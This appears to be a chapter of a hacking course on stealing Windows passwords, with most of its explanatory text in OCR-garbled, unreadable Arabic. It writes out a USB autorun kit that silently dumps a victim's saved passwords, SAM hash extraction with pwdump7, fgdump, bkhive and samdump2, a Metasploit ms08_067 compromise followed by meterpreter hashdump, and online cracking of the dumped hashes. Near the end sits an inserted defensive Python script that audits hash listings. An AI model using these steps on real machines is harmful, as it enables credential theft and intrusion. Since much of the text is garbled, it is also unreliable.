Stealing passwords with a USB drive is a physical approach: the attacker needs physical access to the victim's computer. Many users let the browser and other applications save their passwords, and password recovery tools such as PassView dump those stored passwords (for example the user names and passwords saved by Internet Explorer, Messenger and other applications) to a text file. The attacker puts such a tool on a USB drive together with an autorun file, so that as soon as the drive is inserted the tool runs silently and writes the recovered passwords to the drive. The attack relies on autorun being enabled and works on Windows XP, 7 and 2000; newer Windows versions disable AutoRun for USB drives, so the batch file then has to be started by hand. The USB drive can also be used to plant a rootkit or other malware that captures passwords later.

Steps to steal passwords using a USB drive:

1- Download PassView (a password recovery tool) and copy the files, including the executable (.exe), to the USB drive.

2- Create a file named autorun.inf in the root of the USB drive with the following contents:

[autorun]
open=launch.bat

3- Create a file named launch.bat on the USB drive with the following contents, which runs the tool and saves its output to pspv.txt:

start pspv.exe /stext pspv.txt

4- Insert the USB drive into the victim's computer; the autorun window pops up (if enabled).

5- PassView runs in the background and the recovered passwords are stored in a TXT file on the USB drive.



[Slide: Stealing passwords using USB drives. Download PassView, a password hacking tool; copy the downloaded files to the USB drive; create autorun.inf in the USB drive ([autorun] / open=launch.bat); contents of launch.bat: start pspv.exe /stext pspv.txt; insert the USB drive and the autorun window will pop up (if enabled); PassView is executed in the background and passwords will be stored in the TXT files in the USB drive. Figure: Attacker inserts USB into victim's computer -> User -> Passwords]

The above is the USB password recovery toolkit an attacker uses to steal the passwords stored on the victim's machine.
Stealing Passwords Using Keylogger

Keystroke logging is usually the most effective way of stealing passwords. The password is typed on the keyboard, so any program or device that records keystrokes captures it, together with the user name and everything else the user types. The attacker infects the victim's local PC with a software keylogger (for example delivered by a Trojan), or attaches a hardware keylogger between the keyboard and the computer, which no software on the machine can see. The keylogger captures every keystroke the victim types, including the login credentials the victim uses to log on to the domain server, and sends them to the hacker, who then uses them to gain access to the domain server. Keyloggers are installed without the victim's knowledge and are a serious threat, since antivirus software does not always detect them.

[Slide: Attacker infects victim's local PC with a software keylogger; Victim logs on to the domain server using his credentials; the keylogger sends the login credentials to the hacker; Attacker gains access to the domain server]

Offline Password Attacks (HASH Attack) 



.Jl^il i jlz> Ula a 4 (jil^Jl jl) d^A JJJ-^JI CjLaI£ jjj^j ^Jj ^U^j jjj-^JI 4-4l£ AiJlua^ 4a] j ^iaJL in ^121 ^lall! ^la« a 

.^Jl <(switchj router) ^jf^b <u^y t jjlLj) JjLiUI 4*&$l 4_u*u]L li^j 

Jj^aJl j) LLLuu U£a U£j .^U jl (JzLL V SAM tiU) j^ oilfSl Jj^a^Jl jj^l^J) 4a jj U Ulli j 

dUA ciiaJ! j-uu^J .JjUjj JJLuuil ^Uaj JjS j^ ^i-^JI jjjSJL ^Iajj SAM ^1^1 jl UjLuj Ufi U£ jjlaJ! uiuaj Jau (jilf!! ^^Ip 



Windows Hash Dumping: Pwdump and Fgdump 

lsjZ^J\ ls'^j Jj^j JU^ jj^^ (yj^ c5j^ Windows Hash Dumping 

yjis >l ^ jl HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users^li ^ NT registry 

jc jj^Jl CjUUj D^cla .AjLjjl^ ^ l!^'^ 4_i3l <J jll j>» ^ o L-aLJI 11a jV l^>^j AjUjI^ a j^ SA1VI t *°^^ 
^^JcVI J j^^ j^A^^ ( . illajj c ajl la jll jV j^ j .fetch the hashes J jjAbjll 4-Lila j ^1^1 ml (Jj^a 

.4o^UJI Jj^ajll cj! jliiJ ^ Vjl Jja^JI ^ jjj^ll '(Admin Privilege) 
^^Luj ajjjj^I Jj^ijII jLU ^ Jaxj The Local Security Authority Subsystem (LSASS) 

^ji*^ J) dj^»jll j^l J^jj LSASS ^2 lU*^ Jllj DLL injection pwdump 

^jjij Jc; lU*j Pwdump .NT's SAM *^ i> (OWFS) jj^l lA* Jc- lU*^ <J^j > Pwdump7 
I ^ U & tSbVl jl cj^alll I^a .(SAM) <■ c> g:.:^ <^l ^^klaiJ! CjULu^ (LM and NTLM) jj>^l cjUK cjL^U 
^ ajjSII cjI j ^Ij^IujI ^jj ^ j CjULJI ^alkj ^ SYSTEM i aL&li j SAM c aLil) ^-l^kim! (jyja 

.^ixJI ^Uaill Jc <jjtal cjIjIjIoI ( . llLajj Jl I^a ^l^kjjujl .^lia^aII dAiLJI Jc- Uiajl j^lS <ul pwdump7 

: JUJ) jS^aII (> pwdump7 <> j)A*aV) Jj^aj 

http://www.tarasco.org/security/pwdump_7/index.html 

Jc (Jjj jIaII (JAlVI J^Ji Shift jj^l J^ 4 ^>*' J*^l J 3 ^ J^ 2 *- L>* SbVI jjAbj JjxjuHII ^aUaj ^ 

Open Command Windows here V* ^ c^j^ JJIj .pwdump7.exe J 0 cSJ 1 ^ c£^l 

:JVI£ 



[Screenshot: Windows Explorer context menu on the pwdump7 folder, listing Open, Open in new process, Open in new window, Add to VLC media player's Playlist, Open command window here, Play with VLC media player.]



;4jMI Jl ls^jj jiill a*_> 



[Screenshot: "Administrator: Command Prompt" window opened in the pwdump7 folder.]




.(ntds.dit)^l^l J jj>^l o^j^ ^ active directory u^j^ tic -^j^l* 

jiill cjI ^1 jj^j j^I jVI J pwdump7.exe -M^S c& J 3 pwdump7 sbVI J^i? jVI 

.Enter <ija 

I^Vl^ SAM <■ ^1 C> J JJ^J^ J^ull ^UaJ J 4 k uixll djl^lgJl jl^Jal Jl c£^jJ L-fl^jai lifc 



[Screenshot: Administrator: Command Prompt]

C:\NLINUX\pwdump7>PwDump7.exe
Pwdump v7.1 - raw password extractor
Author: Andres Tarasco Acuna
url: http://www.514.es
Administrator:500:NO PASSWORD*********************:(NT hash unreadable in screenshot):::
jana:1001:NO PASSWORD*********************:(NT hash unreadable in screenshot):::
HomeGroupUser$:1003:NO PASSWORD*********************:(NT hash unreadable in screenshot):::
UpdatusUser:1004:NO PASSWORD*********************:(NT hash unreadable in screenshot):::
LANGUARD_11_USER:1006:NO PASSWORD*********************:(NT hash unreadable in screenshot):::

C:\NLINUX\pwdump7>



.Administrator cjU^!^ Jl ^UbJ SbSft : 4Jajal4 
pwdump7.exe > c&j^ CP- uj^j SAM cjUjI^ j^I ^ jl jSl^Jl £>i* jj j±h ^jSj 

.Enter ^ c:\hashes.txt 

.SAM t aUl CjUjI^ ^IjaJLJ jAj SbVl ^ Sajk j 11a j 

. Jl£ <J-l»-uu3l ^aUaj J jl* abVI £>i& 

pwdump7.exe (Dump system passwords) 

pwdump7.exe -s <samfile> <systemfile> (Dump passwords from files) 
pwdump7.exe -d <filename> [destination] (Copy filename to destination) 
pwdump7.exe -h (Show this help) 

c\ J£ l^j ^ ***** J\i .NT/2000/XP/2003/Vista Jj^j *>*i c> jj^ 1 feu* 1 * bi Fgdump 

jSI jla a ^J^)flJj Asu ^jc liiiil] 4_Lta3l CjliLJl Aiijj (JLg (_£^)^.VI JJ-*VI (j-a ^Asu ^U^ll ^a^l Igi^-aJj Pwdllllip 

J a jl Asu <Jc- £■! JJUJ 



[Screenshot: Administrator: Command Prompt]

C:\>fgdump
fgdump 2.1.0 - fizzgig and the mighty group at foofus.net
Written to make j0m0kun's life just a bit easier
Copyright(C) 2008 fizzgig and foofus.net

fgdump comes with ABSOLUTELY NO WARRANTY!
This is free software, and you are welcome to redistribute it
under certain conditions; see the COPYING and README files for
more information.

No parameters specified, doing a local dump. Specify -? if you are looking for help.
--- Session ID: (unreadable in screenshot) ---
Starting dump on 127.0.0.1

** Beginning local dump **
OS (127.0.0.1): Microsoft Windows Unknown Server (Build 8400) (64-bit)
Passwords dumped successfully
Cache dumped successfully




C:\> fgdump.exe -h 192.168.0.10 -u An_Administrative_User [-p password] 
C:\> pwdump6.exe -u An_Administrative_User [-p password] 192.168.0.10 



^Lucl ^Jjj^J Jl ^ll^J L_fl jjuj SA1VI L *°^^ L>* JJ^>^ (jjjlfc £J^)3J -lliliJ ~ lalLuJJ ^^£3 ~ I^JLuid (jl UjUjcI J £jJaj (jl L_L^Jj 

. JJJ-<J1 4 ^JJSJ p^J JjS jjoJI 4 JlA^j cilia ( ; lUa^ t jjjl ')Ui)\\ 11a ^ 

jSl j ^Lili SAM cjUj!^ ^ lJj^ pwdump7 ^ ^[*.fgdump] J u^W^ cl^j^ Fgdump >»VI 

Extracting the Hashes from the SAM (Locally) 

iajoijlj t J lalll Jj Jxill J Jj^a jll Uj^I j <A^*1\ CA**$1\ j^SUj UjV .^1 jjoj A& Jc J oi^ JjL?^ ^J^ 3 < la^Ji (Jjo^J 
.SAM (J\ Jj^jJI yi jljJ c>jj <hJ lU^ o 3 <Ua V jj^ijj J^ull ^Uaj liA .Windows SAM 

sbVl JaaJI c>^ .cj^Vg-St Jj^ jll obi J.ikU iiUj j^J t*Uil <SAM ( aLll Jljj V t^bU 



jl^JI <> 4^ j^J! o^l jSVl ^ j^j lA^ y^ 1 j 'o^ J 1 ^ J) (43 ."Live CD\DVD " jt^VI 

~ I^JLuiaII BIOS ^ L-Lud^ ^glc ^jjILJI (j-a ^I^JjujI tilj£ ;Ujlilj 4_iJ jj^all (J^al J^Vl ^ixjulL ^ajlj <iL ^aL^Jl L_fl^Jl ^Uaill 

/Ltf j^l u-l c> i> ^ t^V 1 W BIOS ^bl^l J >^ jt ^-211 (F9 in HP Lap) 

oal jSl ^LSuV UNetbootin ^ Ljajl A \ <.aA <>al Jal ^3j^» u>n ^ill ^IkJI ^LA jSj ^ JU> 
^ ^J! >Vl ^bujj^l t> ^AxJ! j "live" ^ ^ lM ^ £^ UNetbootin USB 
cjIj^I <c ^ 6 USB ^j^-* (j-o <L^U Jjy ^Uaj ^li-JiL till ^-<ujjj ISO UNetbootin 

.Igil^jjujl > ^Uail l-jjjjj jjjxll ^UaJ ^liye CD / DVD Jl^Ji \^<& .4-! J^^ ^ J 



(JLLdjiill cJ^-^- c3^^ ^ .Windows <> ^^-Sc ^jii^j c^iJl ^aljSVl til^^xi cJ^^ u-* 



# mount -t ntfs-3g -o rw /dev/sda1 /mnt/sda1



"fdisk -1" J-^VI (J-j*j^J <Llfl 6 JjAJI Jjxjuall ^Uaj ^^Sc IglLaaJ ^ll^J C5-^^J jj^J lS^^-^I ^aUaj J>LaJ ^^jlt 

uj^j dii^ /mnt (mount point) <^ <^^j c^j £^ ^ .(mount)<W^ ^ 

:"mkdir" j^Vl '^L^ ^I^j ^Ull - 



# mkdir /mnt/sda1



.SAM ^jL J521I IjjIS jV! uj^ J ."C:\" jj^ij 

I JLix, jjII ^ JUll j-Vl ^ cJjjia UC. c*S]L f Uall ciixy - 



# cd /mnt/sda1/Windows/system32/config



.SAM < ^ ^j^j] <jjlkJI cjI jlaaJl J£ Lpa^S <La3 ^Ull J£ai3l jjjj .SAM ^ aL> ^U^i l-j^j « JiLdjjII jlLl Is 



root@kali:~# fdisk -l

Disk /dev/sda: 10.7 GB, 10737418240 bytes
255 heads, 63 sectors/track, 1305 cylinders, total 20971520 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x9d499d49

   Device Boot      Start         End      Blocks   Id  System
/dev/sda1   *          63   (end and block count unreadable in screenshot)   7  HPFS/NTFS/exFAT
root@kali:~# mkdir /mnt/sda1
root@kali:~# mount -t ntfs-3g /dev/sda1 /mnt/sda1
root@kali:~# cd /mnt/sda1/WINDOWS/system32/config/
root@kali:/mnt/sda1/WINDOWS/system32/config# ls
AppEvent.Evt  default       default.LOG   default.sav   SAM           SAM.LOG
SecEvent.Evt  SECURITY      SECURITY.LOG  software.LOG  software.sav  SysEvent.Evt
system.LOG    TempKey.LOG   userdiff.LOG  (remaining entries unreadable in screenshot)
root@kali:/mnt/sda1/WINDOWS/system32/config#



^^Ic SjjSI! Ljj^l 4 kaill £c mL p^l\ ^-Ij^IujV Samdump2 cs-^ ^ ^l^iuit 'SAM ( aUll ^W^k ^ 
6^)Laui jjc. 4_kjaij ^jiajc. <J^j (j^i .SA]M L jj° ujj <J V 'Vji Sj^* t^c- l ; ^al jll 'SAM! ( * a ^^ ^-^j 
t_flLJ| tilil "system" y?^^ e^ 1 ^ Samdump2. Samdump2 J^-^ -M^j Cp^ 'SAM 

.SAM ^ & ls'^ o^^^ "system" ^1 t>^ .SAM 
^jj ls^ SAM '"system" ^ ^ "samdump2" j*Vl <Samdump2 J^-^ 

; Jllxijlill ^>*^ (Jjxj^iJ (Jjjia (jc SAM c aL&li djUjla^ (j^J t4 j^q^l £>i& lie. 



# samdump2 system SAM > /tmp/hash.txt



j^l /tmp/hash.txt <-i^t ^ SAM <-&^ cjLjj^ f jSj s am dump 2 0' 



^uji L_fl^i3l ^Uaill 1 bkhive ^^^1 a? jjj^ t> uj^ ^ .system i> (Syskey bootkey) 

t laaJl (jjuo^J .^.jVim^l ^-ULJI C5 ic ^jj^j l_s jjoj ^jII j ^cjUII c aL&li ^juj! j djliLJI ^Uaj jjs j!i3 <^.L^. (jaifl t bkhivecJ^*-*^ 
^ .SAM c aUll ^ill (jjaij c aLll "system" ^ aLll J^Uail c ^i£j U ^ diajjoj jjliU jli t j^i U^j 

. Windows/system32/config^^^ ^ ^ sjIc j tUjIui jj 

^ ^-UiJI ^-Ij^JjojV bkhive s^Uiu»VI 'SAM j system ^-al^i ls'^ ^xll ^ J*i3U t&] ^Ijjal C5 Ic^ 

#bkhive system sys_key.txt 

c aLili ^ Samdump2 ^ ^ > ^ jjuos t<!LaJI .Samdump2 ^l^l^b LLq <l^al 1 v^^j <Jaii3l lie. 

.aliii (jjfa U£ Lb^l Ijj^ cjIuIjI ^1 sys_key.txt 

#samdump2 SAM sys_key.txt > /tmp/hash.txt 



root@kali:/mnt/sda1/WINDOWS/system32/config# bkhive system /tmp/syskey.txt
bkhive 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it

Root Key : $$$PROTO.HIV
Default ControlSet: 001
Bootkey: 5aada46c8d93567e206ab037da780dc2
root@kali:/mnt/sda1/WINDOWS/system32/config# samdump2 SAM /tmp/syskey.txt > /tmp/hash.txt
samdump2 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it

Root Key : SAM
root@kali:/mnt/sda1/WINDOWS/system32/config# cat /tmp/hash.txt
Administrator:500:33ef0e84e3a1051136077a718ccdf409:ff8dfcd941b6f84958d0106aaf650fcd:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:c3c226b0c3bfec57c031ee2773d69ba0:620820d675a4ccc28055005e76e8250c:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:2fea1a611bf83269b878555d3de675a3:::
JANA:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
root@kali:/mnt/sda1/WINDOWS/system32/config#



L_aLJl (JIjujjI (Jj^a {jC A Ll > n n ^aJJ £y (j£-aJj -<fc5 -^Jl O^ji^ LS^\ ^ >^ J clP^ '^"^ ji^Jl JJ^>^ A-aK (jjjlfc Uj^3 ^jVI 

j£ta t^jiilUJ! UK ^ .(jil^il c> ^^uaij j USB o^l ^ 2' J J J J ^ JJ^V^ Au^' c3^J^ c> hash.txt 
jl^aJI l!^*-^ s^tc] lie <jj ^^-istj j .Sj-oioui ci bau] Cjjjjjjull j "Live CD" j» > ^ o-^j* cJ-^ hashes.txt c 

<j£Jj ^jli (JSVI Cjljll^aVlj XP lS^-^I l!^ J*-^ LM o^-6-^ UJ-^ ^-^C- 4jI 6 (J^-&^ U>* L^P" ^ <-M* ^ ^ 

Administrator:500:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537:::

Administrator:500:NO PASSWORD*********************:0CB6948805F797BF2A82807973B89537:::

Extracting Windows Password Hashes Remotely 

Asu (jC JJJ-^ ^-aK (jjjUfc ^^^ic <J jj^^J! 4_jaiaLL<J ^jUL J-^aJ ikli U jCO t^^i^Jl jjlala (j-a Jjo£3 (j^C- (jVI 

i^j^la sasu ^jj oiixJI ^^ic jjuJ! CjIaK jju^ .remotely 

Man in the Middle attack 4- 

jl^l^jjajj ^ kiu c _^j3I ^ jj^ll aj^xJI tilU^ j ettercap ^ajoj^ ^ ^3Ua ettercap 

Metasploit / hashdump ^ 

UlUld ^ .l^^JI jW^^ exploit >^*j j axj ^jc ^jj *^lc o^ixJI a ^^ic jjuJI djUJ£ jju^ 

6<xl<ui A^UIU VNC ^ .if*J^ VNC ^ (j^lSaV Metasploit ^ Uli^j Uik^ t^LaJI 

^ j^j^ yr^j axj ^ J^i ^ J j > ^11 Metasploit ^-fl^j .Meterpreter 

Meterpreter J^-^ ^ .^J j^-^ jj^^ cjUK j (c5 j^' jj*J u^?) j^^ J j^a jll 

jjiijj] <ajU3I 4_ii<iVI CjUIVI ^^a^ JjW^ ^ Meterpreter." hashdump " J^^j aLLouj uAi ^UJI lJ^JI 

^jij lJjjoj lg-£U. metasploit a^j^ jll jiixj armitage sl^Vt ^^ludj lJjjoj j^VI <Jj^uJ 

i^Vl^ aJ^ meterpreter session jW^I exploit 
[Screenshot: Kali Linux running in Oracle VM VirtualBox, Armitage window (menus Armitage, View, Hosts, Attacks, Workspaces, Help; module tree auxiliary, exploit, payload, post). Host 192.168.1.101 is shown as compromised: NT AUTHORITY\SYSTEM @ TEBA-293DD90F08. Console tab:]

[*] 192.168.1.101:139 (windows/smb/ms08_067_netapi)
[*] 192.168.1.101:445 (windows/smb/ms08_067_netapi)
[*] 192.168.1.101:135 (windows/dcerpc/ms03_026_dcom)
[*] Listing sessions...
msf > sessions -v

Active sessions

  1  meterpreter x86/win32  NT AUTHORITY\SYSTEM @ TEBA-293DD90F08  10.0.2.15:58942 -> 192.168.1.101:16752 (192.168.1.101)
     exploit/windows/smb/ms08_067_netapi



icPVIS hashdump j*VI fjfr aJc meterpreter session g&j jW*^ ^ exploit S^M ^ 



meterpreter > hashdump
Administrator:500:33ef0e84e3a1051136077a718ccdf409:ff8dfcd941b6f84958d0106aaf650fcd:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:c3c226b0c3bfec57c031ee2773d69ba0:620820d675a4ccc28055005e76e8250c:::
JANA:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:2fea1a611bf83269b878555d3de675a3:::



:J?H& fgdump jt pwdump7 <> 5^ ^l^l^l l^Ji 

.t_fl^SI ^tkd! j| jlkij exploit cP*-M ^ 
.meterpreter cJi session ^ ^ 
i^Vl^ ^^Jl ^Uaill fgdump pwdump7 jj^j^ <-U*^ ^aj^a^JI 4^ >>r^l L_aL Jj*Vn ^jSj 



meterpreter > upload -r /pwdump7/ C:\\WINDOWS\\system32\\
[*] uploading  : /pwdump7//PwDump7.exe -> C:\WINDOWS\system32\\PwDump7.exe
[*] uploaded   : /pwdump7//PwDump7.exe -> C:\WINDOWS\system32\\PwDump7.exe
[*] uploading  : /pwdump7//readme.txt -> C:\WINDOWS\system32\\readme.txt
[*] uploaded   : /pwdump7//readme.txt -> C:\WINDOWS\system32\\readme.txt
[*] uploading  : /pwdump7//libeay32.dll -> C:\WINDOWS\system32\\libeay32.dll
meterpreter >



i^VtS <J*±£\ meterpreter CMD ^Vl ^ 



meterpreter > execute -f cmd -c 
Process 2028 created. 
Channel 4 created. 
meterpreter > interact 4 
Interacting with channel 4... 

Microsoft Windows XP [Version 5.1.2600] 
(C) Copyright 1985-2001 Microsoft Corp. 

C:\WINDOWS\system32>



.LLLai LftS pwdump7 u ^^ j ^ 
■xp jj^j J^^t fUaS pwdump6 f t.£2«it ^xp jj^j J^SJI fUaS (>*j V pwdump7 :4iajal* 
Cracking Simple LM Hashes 
^jij U .2014 l^J 8 V-j ^Office 2003 j Windows XP SP3 J^dl ^ ^ jjl^U ^ jl ^ UK 

^.^Inn <Jlj2 *^ (^J^ XP jj-^J ^ a hi) (j-a > J^C j # jjjlalill (J^axJ j ^Vlml <Jt ^ JJJ^^ ^y^AaajaLQ 7. 40 L>^ 

tilLiA .ILLoj Lo£ jkA* i^ul l^jj^^j ^j^3 j t^^lc <j^aj ^ jj^>^ ^ ^ U^3^ *^ jjj^li .AjjL^jII <JLgcV1 <J-?^ 

4 Salting (JL^ 3 ^ jffi S^aJ j <j^LkJl jj^Jl Clal jjq *nl l. n > nl j^Jl Ig fl^hin ^^jII A a\\ Jj^Iall ^j-d ^jAslSI 

Cracking Lm Passwords Online 4- 
^ lil) ^U^klaiJ! till £§ jA\ ± jx-±xjij Windows LM hash J^4^ ^ ^1 ^\ ^ ^jaxJI ^Ua 

jj^JI CjU^I j^SI (Ophcrack Objectif Securite ^1 j ^Vl <^ c^ja j 

Jaxj l^ii^jljj^j Cij jjjVI <£f^ 6 j^j^ ^ .SSD o^^ Rainbow table ^l^i^U 

.cjbj^a jljS ^ LM Password i> 

http://www.objectif-securite.ch/en/ophcrack.php 

;XP j^ 1 ^ ^K (JjjIa . J^joJI \±±s U jc^ ^Uill clA^ ^ j lPW^ jj^ <J j^' u 11 

Hash: aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 




^jC ^JjJ V Ui3 j (J^sUjojI j Igilk^l ^ill (JJJ^-li <LIL<JI Empty paSSWOrd J JJ^>^^ ^-aK ^^^C J jj^a^Jl ^Ualoal CJ^. liLd jlajl 

I^Vl^ ^LaJl ^Jjjl^Jlj 4ijLLJlj > ^1 Cljli (JjilA laJLujj ^jVI cJj^ a ^ 
Hash: 17817c9fbf9d272af44dfa1cb95cae33:6bcec2ba2597f089189735afeaa300d4 

[Screenshot: Objectif Securite website (menu: Home, Audits, Consulting, Training, OS Labs, Ophcrack, Contact). Page text: "Ophcrack is a password cracker based on rainbow tables, a method that makes it possible to speed up the cracking process by using the result of calculations done in advance and stored in rainbow tables. Ophcrack is being developed by Objectif Securite under the GPLv2 license." Rainbow tables section: "A set of rainbow tables has been created and optimised for use with Ophcrack. Most of them are available for free. A more advanced set of a size of more than 2TB aimed at security professionals can be bought for $999." Form fields: "Enter your LM hash here to crack it" and "Enter your password here to hash it". Result shown:]

Hash: 17817c9fbf9d272af44dfa1cb95cae33:6bcec2ba2597f089189735afeaa300d4
Password: 72@Fee4S@mura!



Hash: d4b3b6605abec1a16a794128df6bc4da:14981697efb5db5267236c5fdbd74af6 



[Screenshot: the same Objectif Securite Ophcrack page, second submission. Result shown:]

Hash: d4b3b6605abec1a16a794128df6bc4da:14981697efb5db5267236c5fdbd74af6
Password: *mZ?9% A jS743:!



,(jjilgi3 <LLL<J! cs - ^ 6 ^—^ Cy* (J^ujujI a^j 

.Uial J&\ axj ^NTLM Jc* 2008 J /8/7 jj^J £±4 j XP Jj^j LM Jk^ 

Ajiat CjUjI^ ^Ij^j ^1 j^UVl g-i 4_n*^ JSl ( "i^i » ^i t (smartcards) CjtalkJI j (Biometrics) 



meterpreter > hashdump
Administrator:500:33ef0e84e3a1051136077a718ccdf409:ff8dfcd941b6f84958d0106aaf650fcd:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:c3c226b0c3bfec57c031ee2773d69ba0:620820d675a4ccc28055005e76e8250c:::
JANA:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:2fea1a611bf83269b878555d3de675a3:::
[Screenshot: the Objectif Securite Ophcrack page, third submission, with the Administrator hash from the hashdump output above. Result shown:]

Hash: 33ef0e84e3a1051136077a718ccdf409:ff8dfcd941b6f84958d0106aaf650fcd
Password: moramt58



Hash-identifier 

John the Ripper jjj*^ diLalS ^ ^* * -lt^ ^Uaj j jji ^vimi ^Jj^Aj sb) 

^ jj -ja-vlU \ a A laJLujI (j^J SbVI .l^Jib <Jjoij AlxJl 90 ^JJ 't-^ * <^^\ (J^-&^ CP" <^-*^ L_Lu£3l Aijllaj <J>ujjj 

lc jjjj jS^Vl ^ J^W ^^Sj L>^ v3'°^*l- ^^^^ ^ -L$W^ ^ JU ^ <J^"^J Hash ID cJ^^j .^}J-^ c>^-g-^ 

.vui^i jsVi ^ijjt ^ ^ j\ 4^ jst^i 

Kali Linux -> Password Attacks -> Offline Attacks -> Hash-Identifier 

i^Vl^ o^lgJI I^a ^ jh AA\ ±yu lJ* jjoj Hash ID J Jaia 



[Hash-identifier v1.1 ASCII-art banner: By Zion3R, www.Blackploit.com, Root@Blackploit.com]

HASH: 6bcec2ba2597f089189735afeaa300d4

[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
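The dump lines shown in this chapter (user:RID:LM hash:NT hash:::) and the Hash-identifier result above (the NT hash is an unsalted MD4) can be checked with the following script. It is an added example, not code from this book or from any of the tools it describes: it implements MD4 in pure Python (many OpenSSL builds disable md4 in hashlib), derives the NT hash as MD4 over the UTF-16LE password, and audits pwdump/hashdump-style lines for what a defender wants to know from such a listing: accounts whose NT hash equals the empty-password value, accounts that still store an LM hash (case-folded, two 7-character DES halves, no salt, so rainbow-table crackable), and LM hashes whose second half is the blank constant, which means the password is seven characters or fewer. The first four sample lines are the hashdump output from above; "short7" reuses the 01FC5A... LM value from the text under a constructed user name, and "svc_test" is a constructed account whose NT hash is computed at runtime from a made-up password.

```python
import struct

MASK32 = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """MD4 (RFC 1320) in pure Python; hashlib's md4 is disabled in many OpenSSL builds."""
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    r3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):  # round 1: F(b,c,d) = (b & c) | (~b & d)
            f = (b & c) | (~b & MASK32 & d)
            a, b, c, d = d, _rotl((a + f + x[i]) & MASK32, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2: G = majority, constant 0x5A827999
            g = (b & c) | (b & d) | (c & d)
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, _rotl((a + g + x[k] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3: H = xor, constant 0x6ED9EBA1
            h = b ^ c ^ d
            a, b, c, d = d, _rotl((a + h + x[r3[i]] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4]), b, c
        a0, b0, c0, d0 = (a0 + a) & MASK32, (b0 + b) & MASK32, (c0 + c) & MASK32, (d0 + d) & MASK32
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> str:
    """NT hash (what Hash-identifier labels NTLM/MD4): MD4 of the UTF-16LE password, unsalted."""
    return md4(password.encode("utf-16-le")).hex()


EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when LM storage is off / password empty
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty string


def audit_pwdump_line(line: str) -> dict:
    """Parse one user:RID:LM:NT::: line and return the findings a defender cares about."""
    user, rid, lm, nt = line.strip().split(":")[:4]
    lm, nt = lm.lower(), nt.lower()
    findings = []
    if nt == EMPTY_NT:
        findings.append("empty password")
    # pwdump7 prints "NO PASSWORD****..." instead of the blank LM constant
    if lm != EMPTY_LM and not lm.startswith("no password"):
        findings.append("LM hash stored")  # legacy LM: no salt, rainbow-table crackable
        if lm[16:] == EMPTY_LM[16:]:      # second DES half is the blank constant
            findings.append("password <= 7 chars")
    return {"user": user, "rid": int(rid), "findings": findings}


def audit_pwdump(text: str) -> dict:
    """Map user -> findings for every non-empty line of a pwdump/hashdump listing."""
    rows = (audit_pwdump_line(ln) for ln in text.splitlines() if ln.strip())
    return {r["user"]: r["findings"] for r in rows}


# Sample listing (constructed for this example): four lines from the hashdump
# output in the text, one constructed user with the text's 01FC5A... LM value,
# and one constructed account hashed at runtime from a made-up password.
SAMPLE_DUMP = (
    "Administrator:500:33ef0e84e3a1051136077a718ccdf409:ff8dfcd941b6f84958d0106aaf650fcd:::\n"
    "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n"
    "HelpAssistant:1000:c3c226b0c3bfec57c031ee2773d69ba0:620820d675a4ccc28055005e76e8250c:::\n"
    "JANA:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n"
    "short7:1010:01fc5a6be7bc6929aad3b435b51404ee:0cb6948805f797bf2a82807973b89537:::\n"
    f"svc_test:1011:NO PASSWORD*********************:{nt_hash('Summer2014')}:::\n"
)

if __name__ == "__main__":
    assert nt_hash("") == EMPTY_NT  # sanity check of the MD4 implementation
    for user, findings in audit_pwdump(SAMPLE_DUMP).items():
        print(f"{user:15} {', '.join(findings) or 'ok'}")
```

Run it on a saved hash.txt by passing the file's contents to audit_pwdump; any account reported with "LM hash stored" is a sign that the NoLMHash policy is not in force on that machine, and "empty password" accounts (here Guest and JANA) should be disabled or given a password before anything else.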



Findmyhash 
#findmyhash <Encryption> -h hash 



